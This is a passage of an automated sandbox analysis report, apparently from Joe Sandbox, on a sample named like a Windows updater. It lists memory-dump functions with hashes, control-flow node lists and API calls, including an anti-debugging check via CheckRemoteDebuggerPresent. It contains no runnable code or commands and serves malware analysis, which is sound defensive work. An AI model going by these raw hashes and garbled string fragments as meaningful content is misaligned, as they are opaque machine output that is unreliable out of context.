                                                                                          • Opcode Fuzzy Hash: b34dbfc272e271bfd87a19e6dc8462e1e079f96f97b8c8a12e5bd8f0c7f9ac8f
                                                                                          • Instruction Fuzzy Hash: 421108B1D003099FDB10DFAAC445AAEFBF5FF58320F14841AD519A7250DB759940DFA1
                                                                                          Function 00D78B40 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1227 d78b40-d78baf CloseHandle 1230 d78bb1-d78bb7 1227->1230 1231 d78bb8-d78bdd 1227->1231 1230->1231
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2210877807.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_d70000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 7d0885d87877be59858f64a292981c0491edc7c58cc4eb803c630863d8f3d444
                                                                                          • Instruction ID: 1abfe47d9a358d9e095f269339469d05402ddb2fc282f6e055aee630bb349101
                                                                                          • Opcode Fuzzy Hash: 7d0885d87877be59858f64a292981c0491edc7c58cc4eb803c630863d8f3d444
                                                                                          • Instruction Fuzzy Hash: C71128B19002498FDB20DFAAD44579EFBF5AF88324F24841AD519A7240CB75A940CBA1
                                                                                          Function 0574FC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c77ee7a605e380380e265b7d8786be4b0cf05c24e47fea5aea6c131a01417d0
                                                                                          • Instruction ID: 86367f5cc67ab4efcf3bcf9f5d453f9df17e55a2cdf50cac88431361bcd0c099
                                                                                          • Opcode Fuzzy Hash: 9c77ee7a605e380380e265b7d8786be4b0cf05c24e47fea5aea6c131a01417d0
                                                                                          • Instruction Fuzzy Hash: 8C512D747001548FDB14FB65E498A6E37E6EB89706F50C928EA06973C8DF389C41AF91
                                                                                          Function 05747B70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8ee6d331087c33532ac0f0d3ce977cf04c32fb0d88f93468e5a731466775be4
                                                                                          • Instruction ID: 777977133c62f3a43de84b4419b1800b1eb665ed4578cdad5af4d089240313e3
                                                                                          • Opcode Fuzzy Hash: b8ee6d331087c33532ac0f0d3ce977cf04c32fb0d88f93468e5a731466775be4
                                                                                          • Instruction Fuzzy Hash: FB313670600205CFCB09FB66E1586AE37B6EBCA319F50D429E6029B389DF385D029FD1
                                                                                          Function 057417FF Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d9b5349a69b63f2d3d21cd355e7d6f044959bfbfdfc6fb3ba9df8a852c7916d
                                                                                          • Instruction ID: e62f378cd8094611c3b17eff7498d028d9954f3fa8f15ffcf77ea5dada3aed9a
                                                                                          • Opcode Fuzzy Hash: 0d9b5349a69b63f2d3d21cd355e7d6f044959bfbfdfc6fb3ba9df8a852c7916d
                                                                                          • Instruction Fuzzy Hash: 03014B78A003188FD754DB24C88879A77F6FF89315F00C4A9A509A7265DB35AE45CF14
                                                                                          Function 0574FB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55125bdf7d9db5e19f5c8c604c019cba7df6fcf6a0c79661f5c77937a2003257
                                                                                          • Instruction ID: 839432170b2cdf976f30c26ad0ae80f19f6541ccbbc8eaa24c369ead1f01964c
                                                                                          • Opcode Fuzzy Hash: 55125bdf7d9db5e19f5c8c604c019cba7df6fcf6a0c79661f5c77937a2003257
                                                                                          • Instruction Fuzzy Hash: 23F01D30304200CBD714FF76E5A966A32A6FB86786B40C028D7064739DCF289C01EF96
                                                                                          Function 05740ACB Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20c9345c28e61abe5fee368fa18859bff0da9eb43b41c10033bb53b3021c383f
                                                                                          • Instruction ID: 05165c3684a01ab1ad55b16e920839f2591523805ea7f9622297aa3f54eef89a
                                                                                          • Opcode Fuzzy Hash: 20c9345c28e61abe5fee368fa18859bff0da9eb43b41c10033bb53b3021c383f
                                                                                          • Instruction Fuzzy Hash: 49F05E74A40218CFD754DB14CC887AD7772FB45315F008495E60AE7350DB359E84DF05
                                                                                          Function 05745043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d82faeb12cfd2ec3319f69b4524ffdea90fac818f76a21305465ef208ce7fb56
                                                                                          • Instruction ID: cbc88206fe2d2e1ab2c634cea7f6db3969baee1306ad5e6010a3cffaa585187e
                                                                                          • Opcode Fuzzy Hash: d82faeb12cfd2ec3319f69b4524ffdea90fac818f76a21305465ef208ce7fb56
                                                                                          • Instruction Fuzzy Hash: 15E0E5B4A00218CFD754DF24D8897ADBBB2FB89305F00C499E619A7354DB346E84CF04
                                                                                          Function 0574504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d82faeb12cfd2ec3319f69b4524ffdea90fac818f76a21305465ef208ce7fb56
                                                                                          • Instruction ID: cbc88206fe2d2e1ab2c634cea7f6db3969baee1306ad5e6010a3cffaa585187e
                                                                                          • Opcode Fuzzy Hash: d82faeb12cfd2ec3319f69b4524ffdea90fac818f76a21305465ef208ce7fb56
                                                                                          • Instruction Fuzzy Hash: 15E0E5B4A00218CFD754DF24D8897ADBBB2FB89305F00C499E619A7354DB346E84CF04
                                                                                          Function 05747D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ead4ae575f7ebf291613e6c6ee227f520b70bdd68a50950c9ffdd9e05c3b509
                                                                                          • Instruction ID: 8eb65273a47d91ce7b5a621eddfd1442d8eab502a3fe2ed38fb7626e67b244b1
                                                                                          • Opcode Fuzzy Hash: 6ead4ae575f7ebf291613e6c6ee227f520b70bdd68a50950c9ffdd9e05c3b509
                                                                                          • Instruction Fuzzy Hash: 74D09E75941208ABCB00DFE4990959E7BF9EB4A210B1049E59505D7221EE319E106F91
                                                                                          Function 05745134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd61c030c702fcbc36e577bf930b284f8355d3ffd7443323cb675784b83f3757
                                                                                          • Instruction ID: c9cfa8fd03c2bf16c0da716cd84d01e59739ffcabbf3568e4f51dd8ad9f8a207
                                                                                          • Opcode Fuzzy Hash: fd61c030c702fcbc36e577bf930b284f8355d3ffd7443323cb675784b83f3757
                                                                                          • Instruction Fuzzy Hash: DBD067B4A801148FCB94DF64E8D87DCB7B2BB49301F50C8AAA61AE32A0DE304D84CF14
                                                                                          Function 0574BF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 057486F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 05748780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4dc2e4432f210c07e584201bc4aa585cc3adb63f8be79feba54404d39103dbd7
                                                                                          • Instruction ID: 67b123c0e3182d5c3bfd4706939262d426c5e14c572ed9e77721f31de9043402
                                                                                          • Opcode Fuzzy Hash: 4dc2e4432f210c07e584201bc4aa585cc3adb63f8be79feba54404d39103dbd7
                                                                                          • Instruction Fuzzy Hash: 54C02B3015010887C301B755E01449A339EC3C9B15F408028D2050734ACF282C018F91
                                                                                          Function 05741A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ad1347c973a15eafe58cbb1f118e6926e816b39d91cc1d2e744c4d45a0b20e7f
                                                                                          • Instruction ID: 17338295012eb7008aa5b46e356e1a540564a2eecaee7377b518255b90d1a6ba
                                                                                          • Opcode Fuzzy Hash: ad1347c973a15eafe58cbb1f118e6926e816b39d91cc1d2e744c4d45a0b20e7f
                                                                                          • Instruction Fuzzy Hash: AAC002B8A843048FCB145B74A85C3ED7AA2BB4A341F418465B957C2360EB3889409A15
                                                                                          Function 05748760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 057476A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 057487F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 05747310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af9561b4dea037b670769931fb3ce16ea39220011c4067ee9db308e0c9cb485d
                                                                                          • Instruction ID: 1028892d4c95858abd13de0163b32d466d347e9791880165049e4b70aeb89209
                                                                                          • Opcode Fuzzy Hash: af9561b4dea037b670769931fb3ce16ea39220011c4067ee9db308e0c9cb485d
                                                                                          • Instruction Fuzzy Hash: 38A02230002B0CC2820032B02002020338CCA80208B8000B8A30C08A232A33E8A088B8
                                                                                          Function 05747680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 705d62e0ee83c14adf7037c4abb7ad15acf785219037a21aa7bb679e0b2c89da
                                                                                          • Instruction ID: 015eade396225e73b348479914f514c9b7606e0bd423df0ea225f09f95463bbd
                                                                                          • Opcode Fuzzy Hash: 705d62e0ee83c14adf7037c4abb7ad15acf785219037a21aa7bb679e0b2c89da
                                                                                          • Instruction Fuzzy Hash: BFA0243001170CC7C30017717004410735CD70013F3400474D10C005114737D410CD50
                                                                                          Function 05747A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1c400aef75b0a4f50cd020c4c2c8b636acca4d52898ff302e86c3e1206348bb9
                                                                                          • Instruction ID: cd60b73651bffc60893a341c295a66c60dd62f7ee46f35da7c0f01dadb286920
                                                                                          • Opcode Fuzzy Hash: 1c400aef75b0a4f50cd020c4c2c8b636acca4d52898ff302e86c3e1206348bb9
                                                                                          • Instruction Fuzzy Hash: 7D90023108460CCB46406799784979E775CB5495197844051F50D515119A5D64104595
                                                                                          Function 05741A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.2265841056.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_5740000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 056f790d9ce19f1a83eb1cb518398157bf67b2f6662e809126127ddb5898e701
                                                                                          • Instruction ID: 028da550343493ed84c79b73c3b7b4fc384fd2b0c182de36b345fbe37bdd7187
                                                                                          • Opcode Fuzzy Hash: 056f790d9ce19f1a83eb1cb518398157bf67b2f6662e809126127ddb5898e701
                                                                                          • Instruction Fuzzy Hash: AAB011382802088BC3008B00CE8C3AA3A23AB80302F0082A0A003A22A0CB30AC80AE00

                                                                                          Execution Graph

                                                                                          Execution Coverage:6.2%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 5343 58d2c50 5344 58d2c6e 5343->5344 5347 58d2dd0 5344->5347 5351 58d2e08 5347->5351 5354 58d2e03 5347->5354 5348 58d2cbb 5352 58d2e4c CheckRemoteDebuggerPresent 5351->5352 5353 58d2e8e 5352->5353 5353->5348 5355 58d2e08 CheckRemoteDebuggerPresent 5354->5355 5357 58d2e8e 5355->5357 5357->5348 5339 ee8b40 5340 ee8b80 CloseHandle 5339->5340 5342 ee8bb1 5340->5342 5358 ee0850 5360 ee0859 5358->5360 5362 ee3be2 5358->5362 5365 ee34bd 5358->5365 5368 ee88c0 5362->5368 5367 ee88c0 VirtualProtect 5365->5367 5366 ee34d6 5367->5366 5370 ee88d3 5368->5370 5372 ee8970 5370->5372 5373 ee89b8 VirtualProtect 5372->5373 5375 ee3bf8 5373->5375

                                                                                          Executed Functions

                                                                                          Function 05998C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 5998c18-5998c83 call 5990040 call 599bf28 6 5998c89-599bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: 5137468445a98c473d1527aeab45dc4ff0e6fcc25339b4991a25d01bf3aef58c
                                                                                          • Instruction ID: 09baa13ee468c204a5ad9684d81fc712c2f9c5248c8cdb771817959024ad906d
                                                                                          • Opcode Fuzzy Hash: 5137468445a98c473d1527aeab45dc4ff0e6fcc25339b4991a25d01bf3aef58c
                                                                                          • Instruction Fuzzy Hash: 90534034A052188FDB54EF24D99569EBBF2FB88705F5091E9D90DA7385EB309E81CF80
                                                                                          Function 05994DC3 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 610 5994dc3 611 5994dc7 610->611 612 5994dc8-5994dc9 611->612 613 5994dca-5994dcd 612->613 614 5994e59-5994e67 613->614 615 5994dce-5994dd3 613->615 621 5994f7f-5994f8d 614->621 636 5994e6d-5994e74 614->636 615->614 616 5994e79-5994ea6 615->616 617 5994fdb-5994fee 615->617 618 5994dda-5994dde 615->618 619 5994f9d-5994fcb 615->619 620 5994e3c-5994e4d 615->620 615->621 622 599501e-5995020 615->622 623 5994e16-5994e29 615->623 624 5994eab-5994ee5 615->624 625 5994eea 615->625 626 599502c-599503e 615->626 627 5994e2e-5994e3a 615->627 628 5995040 615->628 616->613 629 5994ff0-5995002 617->629 618->612 631 5994ddf-5994e14 618->631 619->625 654 5994fd1-5994fd6 619->654 620->627 642 5994e4f-5994e54 620->642 621->616 643 5994f93-5994f98 621->643 622->628 632 5995022-599502a 622->632 623->629 624->613 635 5994ef6-5994f7a 625->635 639 599500c-5995015 626->639 627->613 629->639 631->613 632->639 635->613 636->611 639->626 645 5995017 639->645 642->613 643->613 645->622 645->626 645->628 654->613
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq
                                                                                          • API String ID: 0-814193904
                                                                                          • Opcode ID: 0fb3045ab6c10ccb297b19c59b5398e86a4c244eabf41edee119c99bc6336bd9
                                                                                          • Instruction ID: 509cdd723ce33cb4df00f5b5d3e333b21dd171eea8f7a6c46e5645c32a21a3d7
                                                                                          • Opcode Fuzzy Hash: 0fb3045ab6c10ccb297b19c59b5398e86a4c244eabf41edee119c99bc6336bd9
                                                                                          • Instruction Fuzzy Hash: 71517874A04218CFDF2AEF69D8547ADB7B6FB84700F1085DAE40AA7390DB355E868F41
                                                                                          Function 058D2E03 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 712 58d2e03-58d2e8c CheckRemoteDebuggerPresent 715 58d2e8e-58d2e94 712->715 716 58d2e95-58d2ed0 712->716 715->716
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 058D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421838741.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_58d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 01821db636fe9609bf351437b88758bd416fec04f54640c0c3496afeb095b3f8
                                                                                          • Instruction ID: 8adfea470a56bb6715fe28157a4052d23e74c915b423890ab176548e6cfcb7d4
                                                                                          • Opcode Fuzzy Hash: 01821db636fe9609bf351437b88758bd416fec04f54640c0c3496afeb095b3f8
                                                                                          • Instruction Fuzzy Hash: 2A2116B18002598FCB14CF9AD885BEEFBF4EF58320F14845AE859A7351D778A944CF61
                                                                                          Function 058D2E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 719 58d2e08-58d2e8c CheckRemoteDebuggerPresent 721 58d2e8e-58d2e94 719->721 722 58d2e95-58d2ed0 719->722 721->722
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 058D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421838741.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_58d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: cb0101933caad96d6415ad173f53a3523b62d7f6600648a24c08a9801faaf7dd
                                                                                          • Instruction ID: 3159650cc9b5a530681c411de737ca0e31530e952c0eb2b23f4ad725c0e67a55
                                                                                          • Opcode Fuzzy Hash: cb0101933caad96d6415ad173f53a3523b62d7f6600648a24c08a9801faaf7dd
                                                                                          • Instruction Fuzzy Hash: C42125B18002598FCB10CF9AD884BEEFBF4AF48320F14845AE859A7351D778A944CFA1
                                                                                          Function 00EE8970 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 725 ee8970-ee89f1 VirtualProtect 728 ee89fa-ee8a1f 725->728 729 ee89f3-ee89f9 725->729 729->728
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00EE89E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2298948110.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_ee0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: df25c4cc6f24d37671be905017edc89203db36d6a886f80eb329ad38d6ce323a
                                                                                          • Instruction ID: 5130f7f546bf605fedf0ce9073ed22fea9aa47faa57405249020e12c7c2b3328
                                                                                          • Opcode Fuzzy Hash: df25c4cc6f24d37671be905017edc89203db36d6a886f80eb329ad38d6ce323a
                                                                                          • Instruction Fuzzy Hash: 431108B1D002499FDB10DFAAC545AEEFBF5FF98324F14841AD419A7250CB759940CFA1
                                                                                          Function 0599BF50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
